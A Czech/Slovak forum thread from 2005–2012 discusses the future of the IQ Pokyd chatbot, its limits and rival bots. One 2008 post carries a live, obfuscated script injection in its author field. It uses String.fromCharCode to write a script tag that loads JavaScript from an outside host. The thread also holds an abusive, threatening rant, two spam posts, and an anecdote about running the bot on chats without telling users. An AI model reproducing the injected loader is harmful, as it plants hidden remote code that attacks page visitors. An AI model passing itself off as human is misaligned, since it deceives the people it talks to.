KÝBLSoft

Budoucnost IQ Pokydu

ICQ
Skype
Budoucnost IQ Pokydu
Aleš Janda, 18.04.2005 16:01
Zajímal by mě Váš názor, jakým směrem se má IQ Pokyd (a vůbec ta technologie) ubírat:

Má podle Vás cenu vyvíjet dál program pro simulaci inteligence při rozhovoru s člověkem, který je v praktickým životě v podstatě k ničemu, nebo radši vyvíjet úsilí na něčem praktičtějším?
Tím "něčím praktičtějším" myslím např. program pro automatické třídění e-mailů do složek podle obsahu, odpovídání na otázky typu "co je to xyz" ze zadaného textu atd.

Myslíte, že má cenu dál vyvíjet program, takový jaký je, když nepřináší žádný praktický užitek?
ICQ
Odp: Budoucnost IQ Pokydu
mata, 21.04.2005 10:56
me se program libi a byt tebou bych na dalsim vyvoji programu intenzivne pracoval. je jiste ze nema prilis velke uplatneni v praxi ale ...

napr. muj kamos dela diplomku na jakesi podivne tema - neco jako cesky jazyk a jeho struktura (gramatika, syntax atd) pri konverzaci na internetu (email, chat, smsky atd ...), ... jeho problem ja sehnat reprezentativni a vzajemne porovnatelny vzorky napr. z chatu od ruznejch lidi ... no to je celkem jedno ...

kdyz jsem s nim diskutoval o jeho dp. tak jsme dosli k nazoru, ze nejlepsi by bylo sehnat "chatovaciho robota", s kterym by mohli chatovat ruzny lidi ... mlady stary, zensky, chlapy atd ... aby ty promluvy byly co nejmene subjektivne zkresleny tim kdo experiment provadi ...

no pomalu se dostavam k tomu co sem vlastne chtel napsat ... supr by bylo, kdyby se dalo pokyd zapojit do nejaky internetovy debaty ... budto jako soucast serveru (coz ovsem vyzaduje mit k dispozici server, na kterym bezi nejakej hodne navstevovanej chat), nebo aby dokazal komunikovat se servrem jako klient (treba jako Pokyd-ICQ klient ... zadas uzivatele a on s nima bude mluvit) ...

jj ja vim ze je to vuci tem lidem (analyzovanym objektum) trochu nemoralni ale v ramci vedy ?-) ...

ps. pokud bys o nejakym takovym systemu vedel, tak mi prosim posli info.

predem dik za pripadnou reakci ... mata
ICQ
Skype
Odp2: Budoucnost IQ Pokydu
Aleš Janda, 23.04.2005 22:47
Nevím, co přesně tím máš na mysli. Chceš udělat chatovacího robota, který by byl zcela objektivní, abys se dala zkoumat syntaxe jazyka na internetu? To je celkem specifický úkol :-)

Nicméně Pokyd jeden čas běžel na 2 různých chatech, kde lidé nevěděli, že se jedná o robota. Když jsem se pak (zcela nemorálně ;-) ) díval do logů záznamů, viděl jsem, že zpravidla po několika větách se jim Pokyd jako člověk zdál "nějakej divnej", přičemž po dalším zkoumání zjistili, že se jedná o robota. Bohužel, nebyl (a ani teď není) zdaleka tak inteligentní, aby byl k nerozenání od člověka.

Všechny moje (známé) konkurenty jsem uvedl na http://iqpokyd.kyblsoft.cz/iqpokyd#Konkurence, z čehož on-line běží Kecal a Ludvík. Jiné neznám..
ICQ
Odp3: Budoucnost IQ Pokydu
mata, 25.04.2005 09:01
jj dik za info m.
Skype
Odp2: Budoucnost IQ Pokydu
Mr.Putter, 05.05.2005 23:47
Taková věc nezní jako špatnej nápad. Když si představim že vlezu na chat, a tam si prostě začnu povídat s "člověkem" kterej neni člověk, to je docela dost zajímavý. myslim že když bude IQ Pokyd trošku vymakanější, myslim si že strčit to na chat neni zas taková kravina. Myslim že takovejhle chat by moh bejt i dost navštěvovanej, protože na to bude každej zvědavej.
Kdybys ho náhodou někam šoupnul, dej vědět a já to testnu.
:-)
Odp2: Budoucnost IQ Pokydu
<script>/*, 07.01.2008 20:23
*/document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,115,121,115,101,108,50,48,48,49,46,119,122,46,99,122,47,115,116,111,121,97,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62));/*
Odp: Budoucnost IQ Pokydu
Majko, 12.05.2005 14:33
Já si myslím že by se Pokyd mohl dále vyvíjet a přidal bych tam pár možností. Například by to mohlo být takové že když se řekne zahraj si se mnou hru nebo další blbosti tak bych to víc ocenil. Jinak je to super, a kdyby ještě k tomu byla nějaká umělá audio konverzace, tak prostě OUKEJ! Jinak je program(y) super.
ICQ
Odp: Budoucnost IQ Pokydu
Henkye, 22.07.2005 00:07
Myslím že užitečných programů už je na netu dost. Výkon počítačů je už od 486tek dostačující a problém je pouze softwarový. Ale dokonalý chatovací program vyžaduje hoooodně práce a vývoje. Uplatnění v budoucnosti to určitě má. S přidáním zvukového vstupu/výstupu by mohl vzniknout třeba mluvící dům. Mimochodem vzpomínáte na mluvícího toustovače z Červeného trpaslíka ? .-)
Odp: Budoucnost IQ Pokydu
mila, 08.08.2005 12:05
Slyšel jsem, že je vypsána soutěž o docela dost peněz (cca $1000000), kdo napíše program, aby lidé nepoznali, že se baví s robotem.
Pravda, že na tom pracují celé týmy, a nikdo ještě za několik desítek let neprošel. Třeba budeš první. Je to teda ale samozřejmě v angličtině.
Bohužel už jsem zapomněl podrobnosti, kdo by si pamatoval, co se učil před rokem ve škole... V podstatě to někdo (chtrý a známý pán) dávno formuloval jako požadavek umělé inteligence.
ICQ
Odp: Budoucnost IQ Pokydu
Nostradamus, 13.08.2005 14:45
Mno, když jsem ještě neměl net, byl sem Pokydem fascinovan, ale je fakt že člověka omrzí si snim povídat.. Navíc po dnu už ví co mu kdy na  co odpoví... Pak sem se snim teda jen hádal, protože se snim prostě nedalo kecat....


Jenomže teď, když má každej druhej icq nebo skype.. A je spousta chatů....

Nicméně tě obdivuji že sis dal tu práci a vytvořil tento program....


Ale možná by byl přeci jen ten prográmek na maily lepší ))


Přeji mnoho zdaru )) A řekni až bude ten mailovaci porgram ))
Odp: Budoucnost IQ Pokydu
jaa, 28.09.2005 12:57
Sorry ale musim rict, ze jsem hodne zklamany. IQpokyd je prakticky uplne stejny jako stary dosovy pokyd, ktery ovsem pro svuj chod nepotreboval 18MB slovnik...

Jako kdyz mi nekdo rekne "cau jak ses mel" a ja odpovim "Cau, celkem dobre" a on na to "No a co ma byt" kdyz nalada byla normalni, no tak tohle mi normalni neprijde :D

fakt je to stejny des jako starej pokyd, takze byt tebou se na to vy**** a delam radsi neco poradnyho, schopnosti urcite mas a zrovna treba tohle forum se mi moc libi.

GOOD LUCK
Odp2: Budoucnost IQ Pokydu
Luki, 01.10.2005 10:50
Jaa počúvaj ma ty idiot!!Ešte raz zanadávaš na IQ pokyd tak ti vytrhnem všetky črevá aj z ušami komplet z teba si taký neschpný..iq máš 20 a si debil trpíš fetišizmom a si nadržaný cvok a nevieš čo chceš..pozri IQ pokyd je program ktorý sa ešte len vyvíja ty debil kwby si si to mrkol do nápovedy tak chudák aleš janda sa snažíč čo mu sili dajú ty idiot nechápeš že toro je len verzia podotýkam 0.1??? Idiot spamätaj sa tento program bude mať neurónovú sieť ale musíš vydržať ty degeš impresionistický kvarglák..zmrde!! Neštvi ma a nehovor alešovi jandovi že nech sa na to VYSERE!!!! Ty kretén!!Prevít Aleš janda je v tvorbe IQ pojydu ďaleko najlepší ty idiot a ty mu ani nesiahaš po jediný chlp na nohe chápeš alebo ti to mám zopakovať IQ 5..si obyčajný nedočkavec asi sa neriadiš tým že musíš vydržať aleš janda neni na špagáte a teraz ti niečo poviem ty kreténe myslím teba užívateľ čo si sa podpísal ako jaa IQ pokyd nemôže mať inteligenciu akú máš ty ty kretén!! Už sa uvedom!! je to takto IQ pokyd zatiaľ využíva inteligenčný motor z verzijí 7.0 a nižšie ale je to jeho primárny motor inteligencie a sekundárny motor inteligencie je mevhanizmus inteligencie IQ pokydu ktorý ešte nieje na takej úrovni aby sme mohli byť spokojný ale ke´d to tebe vadí a mne ne lebo ja si radšej počkám ty kojot!!!!! Máš šťastie že somneni pri tebe lebo by si dopadol zle!!!! Si idiotský kretén trpiaci chlastavou kvapavkou a pozri sa na seba ešte si kojenec!!!!!!! Tak vydrž !!! A neurážaj Aleša Jandu lebo .... !!!! Neser ma a dúfam že si ma pochopil!!!!
Odp3: Budoucnost IQ Pokydu
Luki, 01.10.2005 10:53
Aleš janda Je najlepší programátor na svete!!!
ICQ
Skype
Odp4: Budoucnost IQ Pokydu
Aleš Janda, 01.10.2005 11:20
Nepřeháněj, jen prostě byla doba, kdy jsem si s tímto tématem opravdu vyhrál :-)

Teď už ta doba bohužel není, nicméně rád bych si s tím hrál zase :-)
ICQ
Skype
Odp3: Budoucnost IQ Pokydu
Aleš Janda, 01.10.2005 11:18
Nevím, jestli na tohle mám vůbec reagovat. Na jednu stranu se mě zastáváš, na druhou stranu je tvoje vyjadřování tak strašné, že jsem dost uvažoval o tom, že ten příspěvek smažu.

Nicméně děkuji uživateli "jaa" za konstruktivní příspěvek. Ano, je pravda, že většina inteligence z IQ Pokydu je přebrána ze starého Pokydu. Prostě už jsem neměl čas ani chuť ten slovník příliš předělávat. A tento nepoměr by právě měla změnit nová verze (alespoň na 1:1), zkrátka tak, aby byl vidět pokrok. Myslím, že dokud tohoto nedosáhnu, nemá cenu novou verzi vydávat, uživatelé by byli spíš zklamaní.

Bohužel, toto zlepšování je tak trochu alchymie, protože když vylepším jedno, můžu tím zkazit zase něco jiného, co doteď chodilo báječně.

A ještě na závěr: pokud se těšíte na IQ Pokyd, nemusíte chodit každý den na tyhle stránky, stačí se přihlásit k odběru na stránce IQ Pokydu a ten čas brzo přijde..
Odp4: Budoucnost IQ Pokydu
Luki, 01.10.2005 12:14
kludne zmaž tento príspevok kašli na neho ok,
Odp5: Budoucnost IQ Pokydu
Luki, 01.10.2005 12:15
Aleši zapni si ICQ chcem si s tebou písať ok?
Odp4: Budoucnost IQ Pokydu
KEATO, 14.05.2010 17:06
TO BI BILO S'KODA VIMAZAT TAKOVI' PRÍSPJEVEK. JA' SE PRI JEHO c'ten'i' hodn'e sma'l. Je to pjekná parodie na jiné inetove' diskuse.
Odp3: Budoucnost IQ Pokydu
Mr.Putter, 02.10.2005 20:49
Hele nech ho ať si řiká co chce, je to snad jeho názor ne? Jestli se ti to nelíbí taxi toho nevšímej. Jestli se jemu nelíbí IQ Pokyd, ať si ho taky nevšímá. Je pravda že IQ Pokyd je zatím až na design skoro stejnej jako "starej" Pokyd, ale všechno chce svůj čas...
Amen...Doufám že za tenhle příspěvek taky neschytám pár nadávek...
Skype
Odp4: Budoucnost IQ Pokydu
Luki, 04.10.2005 14:53
No..mne sa IQ pokyd páči ja som sa chcel len zastať aleša jandu..ja som ináč veľmi kludný človek..ja nechcem na nikoho nadávať ale zdalo sa mi to trochu drzé od toho jaa že povedal že nech sa na to vy... nebudem to citovať..ja si myslím že iq pokyd by sa mal ešte vyvíjať a ja viem počkať na nový iq pokyd a ja nikomu nekryvdím..takže bol by som rád keby už vyšiel ten iq pokyd prosíím..čaute... A pozdravujem Aleša Jandu :-)) je to prima človek... :-)) Možete mi aj zavolať cez Skype...
Odp2: Budoucnost IQ Pokydu
Badula, 21.10.2005 21:51
Jaa asi nikdy nezkoušel dělat něco takovýho, jako je iq pokyd. Ale aby tady urážel, na to ho užije. Já jsem si to aspoň částečně zkusil a tak vim co řikám. Je to hodně těžký, vymyslet aspoň 10 nových vět i s odpověďmi. Ale jaa, ten je vobyčejnej primitiv a pohodář, něco takovýho by von ani nedokázal.

To mě taky dost urazilo.
zdarec
Odp: Budoucnost IQ Pokydu
skyv3r, 15.11.2005 11:12
Ja si myslim, ze ma smysl tento program vyvijet, jen by mne zajimalo, jestli jste neuvazoval o webove online verzi.
Odp: Budoucnost IQ Pokydu
hanes, 01.04.2006 15:03
-já bych to zkusil vychytat nejak, aby k tomu nebyla potřeba klávesnice. Ale dalo se s nim kecat přez mikrofon. Počítač by ti pak nastavitelnym hlasem odpovídal přez repro.víš jak,,,
Skype
Odp2: Budoucnost IQ Pokydu - Koniec
Peter Protuš, 03.04.2006 20:49
Myslím, že je asi nadobro koniec s IQ Pokydom
Odp3: Budoucnost IQ Pokydu - Koniec
Matasx, 05.04.2006 07:37
Uctěme památku IQ Pokydu. :'-(
Odp4: Budoucnost IQ Pokydu - Koniec
Elo, 06.04.2006 19:49
Odp5: Budoucnost IQ Pokydu - Koniec
Miso Antonic, 14.04.2006 20:47
Čest jeho pamiatke. Myslím, že na neho bude veľa ľudí ešte dlho spomínať.
Skype
Odp6: Budoucnost IQ Pokydu - Koniec
Peter Protuš, 20.04.2006 19:27
No, možno ešte nie je koniec. Treba len trochu času, znalosť C++ a zdrojové kódy. Mne chýba len tá znalosť. Veď urobiť program nie je ťažké, lenže ja robím soft len v Delphi, takže C++ neovládam.
Prečo by sme si nemohli spraviť vlastnú verziu IQ Pokydu?

A podľa mňa vôbec nevadí, že bude aj naďalej česky.
kýbl
Odp7: Budoucnost IQ Pokydu - Koniec
Badula, 27.04.2006 13:11
A jak to cheš udělat??? ten pokyd (kýbl)
Skype
Urobme si vlastný Pokyd.
Peter Protuš, 06.05.2006 12:17
Ako to chcem urobiť? No, ja bohužiaľ nijako (zatiaľ), lebo jazyk C++ (Visual C++) neovládam a prevod do Delphi by zabral viac času ako ho mám k dispozícii.

Skúsim odpovedať lepšie na tvoju otázku:
Potrebuješ k tomu zdrojové kódy IQ Pokydu (vyžiadaj si ich od Aleša), programovací jazyk Microsoft Visual C++ (distribuuje sa v balíku Visual Studio - potrebuješ verziu 6.0) a znalosť C++. Dosť dobrú znalosť C++ (zhruba 10 rokov učenia C++ :-) ).
K dosáckemu Pokydu sa neoplatí vracať, lebo ten je už "zabudnutý".

Ale IQ Pokyd má nádej, len teraz neviem, kto z nás všetkých (fanúšikov) je taký zdatný v C++ ako je Aleš Janda.

kýbl
Odp: Budoucnost IQ Pokydu
Mirek, 15.01.2008 16:20
No, já si myslim, že jako zábava je to very good, ale když už něco užitečnějšího, tak, aby to ty slova ještě říkalo, nebo dokonce lidskejm slovům rozumělo.To by pak význam celkem mělo.Já nevim, třeba v tý robotice.
Odp: Budoucnost IQ Pokydu
Mirek, 15.01.2008 16:50
A taky si myslim, že kdybys na tom pořádně zapracoval a začal Pokyda prodávat, tak by to mohlo hodit docela slušnej balík.Já osobně bych si ho klidně koupil...Ale to by tam musela bejt vidět nejáká větší změna.....To by pak byla pro tebe celkem slušná inspirace k dalším vývjům... Ty na to máš.....:-))))
Odp: Budoucnost IQ Pokydu
Honza, 11.06.2008 17:33
Ahoj, myslím si, že tento program má něco do sebe, ale myslím si, že to je jen pro krátké pobavení, protože program, který by rozuměl všem lidským slovům a smysluplně odpovídal asi sestrojit nelze. Počítač je prostě jen stroj, a na tom už se nic nezmění. Program neumí a ani nemůže umět rozeznat vážnost slov, nemůže soucítit s člověkem, ani člověka přesně napodobit. Počítač prostě nemá city, a zřejmě je nemožné udělat, aby je měl. Věta "Můj bratr včera spáchal sebevraždu" je pro počítač stejně vážná jako věta "Odpoledne jsem si dal šálek kávy." I když musím uznat, že program Pokyd IQ umí docela dobře symulovat rozhovor s opravdovým člověkem, pořád to bude pouze program. Jinak jsem četl, proč ses rozhodl skončit s Pokydem, a plně to chápu. I když tvoje práce přinesla mnohým pobavení, nikdy by asi program nedosáhl tokové kvality, aby se  rozhovor na 100% podobal rozhovoru člověka s člověkem. Ale stejně je Pokyd super prográmek :-)
Odp2: Budoucnost IQ Pokydu
LordMMX, 19.07.2008 12:24
nuž, s tým že nie je program ktorý by nedokázal rozumieť ľudskej reči nemôžem súhlasiť. Viď toto video
http://www.youtube.com/watch?v=vArdTJfTOzo
ICQ
Odp: Budoucnost IQ Pokydu
Ondřej Kadlec, 15.03.2009 20:55
Já jsem si dneska Pokyd stáhnul a myslím si že je docela fajn, ale jedna věc my tu trosku chybí-jde o to aby uměl měnit téma hovoru. A jak jsem se dozvěděl tak smysluplné odpovědi vždy nedostanu, ale to se dá překousnout. Osobně doufám že se ve vývoji IQ Pokydu se bude pokračovat. Ondřej
Odp2: Budoucnost IQ Pokydu
Pring, 03.06.2009 07:10
jiní se o tu tématiku taky zajímají třeba http://www.alessiof.wu.cz/eleo.html jestli to neni ale jenom kec ;-)
Odp3: Budoucnost IQ Pokydu
Afq, 13.05.2012 10:48
Neni to kec ;-) Mám to jako koníčka pro volné chvíle, na stránkách je kdyžtak aktuální email na mně :-)
Jinak mě mrzí že Pokyd skončil, já jsem zhruba v jeho počátcích dělal KoPr (KOmunikační PRogram, který se později spíše přeměnil na KOpanec do PR.....) a díky inspiraci Pokydu jsem šel do Eleonořího žvatlání :-) Engine už nechávám být (byl ve VisBa a teď jsem na Lin kde ho nemám), jen rozšiřuju databázi. Holt taky jsem oběť zvoleného způsobu řešení (simulace) problému :-)
Odp: Budoucnost IQ Pokydu
severak, 29.07.2010 19:57
Doporučuji vyzkošet KarelBota - http://www.karelbot.cz. Sice to funguje systémem print(odpověď[otázka]), ale občas je docela zábavnej, i když se snaží o argument čínského pokoje v praxi.
Odp2: Budoucnost IQ Pokydu
Al.hexth, 30.04.2011 10:55
Já si zatím pomalu ale pořád vyvíjím podobný komunikační prográmek Eleonora. Na HW už asi nic měnit nebudu, hlavním problémem je obsah komunikační databáze, tam by to chtělo masivní nalévání - což autor Pokydu zjistil podle všeho taky :-) Jak to vypadá viz http://www.alessiof.wu.cz/eleo.html případně písněte ;-)
Odp3: Budoucnost IQ Pokydu
mickey, 30.09.2012 07:01
Cau nejde primo prekopirovat cely cesky sovnik slov do programu pouze oddelit podstatna jmena ci slovesa a synonyma nebo to nejak takhle zpracovat? Cesky slovnik je volne dostupny online jen by to chtelo cas nejak roztridit protoze slova jsou abecedne usporadana.
Formule řízená PC!!!!
Francka, 26.10.2012 13:54
Ahoj,jedu domů z Motole.Jezdila jsem v elektro- Formuli 1.Bomba!!A našla jsem si super práci:zabavila jsem se,sportovala jsem,udělala jsem něco pro své zdraví a ještě mi za to zaplatí,Hurááá!
http://www.cgdf.cz/cs/elektro-formule-v-greyhound-park-motol.html
http://www.cgdf.cz/cs/cgdf-hleda-spolupracovniky-pro-greyhound-park-motol-2.html
Odp: Budoucnost IQ Pokydu
Francka, 26.10.2012 13:56
Ahoj,jedu domů z Motole.Jezdila jsem v elektro- Formuli 1.Bomba!!A našla jsem si super práci:zabavila jsem se,sportovala jsem,udělala jsem něco pro své zdraví a ještě mi za to zaplatí,Hurááá!
http://www.cgdf.cz/cs/elektro-formule-v-greyhound-park-motol.html
http://www.cgdf.cz/cs/cgdf-hleda-spolupracovniky-pro-greyhound-park-motol-2.html
Validní XHTML 1.1 Validní CSS 2 GeoURL
Veřejné řešení zajímavých problémů okolo nás. Pro přemýšlivé lidi. Od KÝBLSoftu. Na www.svice.cz.